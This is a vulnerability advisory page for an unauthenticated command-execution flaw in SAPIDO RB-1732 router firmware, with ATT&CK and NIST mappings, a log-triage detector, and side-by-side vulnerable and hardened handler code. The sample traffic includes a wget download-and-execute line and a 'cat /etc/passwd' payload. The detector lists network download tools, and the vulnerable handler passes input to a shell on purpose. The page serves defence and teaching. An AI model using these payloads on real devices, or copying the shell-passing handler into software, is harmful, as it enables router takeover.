CVE-2019-25487
Published: 11 March 2026
Summary
CVE-2019-25487 is a critical-severity Authorization Bypass Through User-Controlled Key (CWE-639) vulnerability. Its CVSS base score is 9.3 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 5.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Deeper analysis
CVE-2019-25487 is a remote command execution vulnerability affecting the SAPIDO RB-1732 router on firmware version V2.0.43. The issue arises in the formSysCmd endpoint, where unauthenticated attackers can submit malicious input through POST requests containing shell commands in the sysCmd parameter, leading to arbitrary system command execution on the device.
Unauthenticated attackers can exploit this vulnerability remotely over the network with low attack complexity and no privileges or user interaction required, earning it a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Successful exploitation allows attackers to execute code with router privileges, potentially compromising confidentiality, integrity, and availability of the device.
Advisories referenced in VulnCheck and an Exploit-DB entry (exploit 47031) describe the vulnerability and proof-of-concept exploitation details. No vendor patch or mitigation guidance is given in the referenced material.
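The request pattern described above (an unauthenticated POST to the formSysCmd endpoint carrying a command in sysCmd) is simple enough to triage from web logs. The following is an added detection example, not code from SAPIDO, VulnCheck or the Exploit-DB entry: only the endpoint name (formSysCmd) and the parameter name (sysCmd) come from the advisory, while the log line format, the path prefix, the session-cookie name and every sample request are constructed for illustration. Note that the payload does not need shell metacharacters, since the endpoint runs whatever arrives in sysCmd, so the severity is driven by the endpoint, the presence of a command and the session state rather than by metacharacter matching.

```python
"""Triage HTTP requests for the SAPIDO RB-1732 formSysCmd pattern (CVE-2019-25487).

Added example for this page; not code from SAPIDO, VulnCheck or Exploit-DB.
Only the endpoint name (formSysCmd) and parameter name (sysCmd) come from the
advisory. Log format, path prefix, cookie name and sample requests are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log format: METHOD PATH COOKIE BODY (single spaces, '-' for empty).
LOG_RE = re.compile(r"^(?P<method>\S+) (?P<path>\S+) (?P<cookie>\S+) (?P<body>.*)$")

# Secondary signal only: separators, substitution, redirection, or a leading
# download/network utility make the value look like an attacker's command.
# Absence of these does NOT clear a request (a bare "cat /etc/passwd" works too).
SHELL_META = re.compile(r"[;&|`$<>]")
DOWNLOADERS = re.compile(r"^\s*(wget|curl|tftp|busybox|telnetd|nc)\b")


def classify_request(method, path, body, authenticated):
    """Return (severity, detail) for one request.

    critical  POST to formSysCmd with a non-empty sysCmd and no session
    high      same payload from an authenticated session (admins rarely need
              raw shell through the web UI, so still alert-worthy)
    low       formSysCmd reached without a sysCmd value
    none      anything else
    """
    if not urlsplit(path).path.rstrip("/").endswith("formSysCmd"):
        return "none", "endpoint not targeted"
    params = parse_qs(body, keep_blank_values=True) if method.upper() == "POST" else {}
    cmd = params.get("sysCmd", [""])[0].strip()
    if not cmd:
        return "low", "formSysCmd reached without sysCmd"
    shell_like = bool(SHELL_META.search(cmd) or DOWNLOADERS.search(cmd))
    sev = "high" if authenticated else "critical"
    return sev, f"sysCmd={cmd!r} shell_like={shell_like}"


def scan_log(lines, session_cookie="SESSIONID"):
    """Parse constructed log lines; return every (severity, path, detail) above 'none'."""
    findings = []
    for ln in lines:
        m = LOG_RE.match(ln.strip())
        if not m:
            continue
        body = "" if m["body"] == "-" else m["body"]
        authed = f"{session_cookie}=" in m["cookie"]
        sev, detail = classify_request(m["method"], m["path"], body, authed)
        if sev != "none":
            findings.append((sev, m["path"], detail))
    return findings


# Constructed sample traffic against a lab device, not captured data.
SAMPLE_LOG = [
    "GET /index.htm - -",
    "POST /boafrm/formSysCmd - sysCmd=cat+/etc/passwd&apply=Apply",
    "POST /boafrm/formSysCmd SESSIONID=abc123 sysCmd=wget+http://203.0.113.9/x+-O+/tmp/x%3Bsh+/tmp/x",
    "POST /boafrm/formSysCmd - apply=Apply",
    "POST /boafrm/formPortFw SESSIONID=abc123 port=8080",
]

if __name__ == "__main__":
    for sev, path, detail in scan_log(SAMPLE_LOG):
        print(f"{sev:8} {path} {detail}")
```

Run as-is, the sample log yields one critical finding (unauthenticated `cat /etc/passwd`), one high finding (authenticated download-and-execute chain, flagged shell_like) and one low finding (form reached with no command). In practice the "authenticated" signal should come from the device's own session semantics; the cookie name here is a placeholder.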
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2019-19765
Vulnerability details
SAPIDO RB-1732 V2.0.43 contains a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary system commands by submitting malicious input to the formSysCmd endpoint. Attackers can send POST requests with the sysCmd parameter containing shell commands to execute code on the device with router privileges.
- CWE(s): CWE-639 (Authorization Bypass Through User-Controlled Key)
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Unauthenticated RCE via a public-facing router web endpoint (formSysCmd) maps to Exploit Public-Facing Application (T1190), and the resulting arbitrary shell command execution on the network device maps to Command and Scripting Interpreter: Network Device CLI (T1059.008).
Affected Assets
SAPIDO RB-1732 router, firmware V2.0.43
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): requires validation and sanitization of the sysCmd parameter input to the formSysCmd endpoint, directly preventing arbitrary command injection and execution.
- AC-3 (Access Enforcement): enforces approved authorizations, requiring authentication before access to the formSysCmd endpoint and blocking unauthenticated remote attackers.
- SI-2 (Flaw Remediation): mandates timely identification, reporting, and correction of the command execution flaw in the router firmware, eliminating the vulnerability.
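To make the two preventive controls above concrete, here is an added example that is not the RB-1732 firmware (the page does not reproduce it) and not vendor code: it re-creates the pattern the advisory describes, a sysCmd form value handed to a shell with no session check, beside a hardened handler that applies AC-3 (authorization enforced before the body is read) and SI-10 (the request can only select a fixed argv vector; no shell is ever invoked). Function names, the session store, the action allowlist and the form dictionaries are constructed.

```python
"""Vulnerable and hardened sketches of a formSysCmd-style handler.

Added example for this page, not the RB-1732 firmware and not vendor code.
Function names, the session store, the allowlist and the form values are constructed.
"""
import re
import subprocess


class Unauthorized(Exception):
    pass


class InvalidInput(ValueError):
    pass


# --- the pattern the advisory describes (do not deploy) ----------------------
def vulnerable_sys_cmd(form):
    """No session check; whatever arrives in sysCmd is executed by /bin/sh."""
    cmd = form.get("sysCmd", "")
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# --- hardened version --------------------------------------------------------
# SI-10: the request may only select one of these fixed argv vectors. The shell
# is never involved, so separators and substitutions in the input are inert.
ALLOWED_ACTIONS = {
    "uptime": ["uptime"],
    "ifconfig": ["ifconfig"],
    "ping": ["ping", "-c", "3"],  # target appended only after validation
}
# Constructed stand-in for the device's session store.
VALID_SESSIONS = {"abc123"}
# Simplified target check: hostname or dotted-quad characters only. A real build
# would also resolve the name and range-check the address.
TARGET_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def build_argv(form, session_id):
    """Return the argv list to execute, or raise. Pure function, easy to test."""
    # AC-3: enforce authorization before the request body is even inspected.
    if session_id not in VALID_SESSIONS:
        raise Unauthorized("login required")
    action = form.get("action", "")
    argv = ALLOWED_ACTIONS.get(action)
    if argv is None:
        raise InvalidInput(f"unknown action {action!r}")
    argv = list(argv)
    if action == "ping":
        target = form.get("target", "")
        # Reject shell syntax, whitespace and option injection ("-c 100000 ...").
        if not TARGET_RE.fullmatch(target) or target.startswith("-"):
            raise InvalidInput("bad ping target")
        argv.append(target)
    return argv


def hardened_sys_cmd(form, session_id):
    """Execute the validated argv without a shell and with a bounded runtime."""
    argv = build_argv(form, session_id)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout


if __name__ == "__main__":
    # Constructed requests: the injection succeeds against the old handler ...
    print(vulnerable_sys_cmd({"sysCmd": "echo hello; echo injected"}))
    # ... and is stopped at two different layers by the new one.
    for form, sid in [({"action": "uptime"}, "nosuchsession"),
                      ({"action": "uptime; id"}, "abc123"),
                      ({"action": "ping", "target": "127.0.0.1; id"}, "abc123")]:
        try:
            build_argv(form, sid)
        except (Unauthorized, InvalidInput) as e:
            print(type(e).__name__, e)
```

The separation of build_argv from execution is deliberate: the authorization and validation logic can be unit-tested without spawning processes, and a reviewer can confirm that no code path reaches subprocess.run with shell=True or with an argv element taken verbatim from the request.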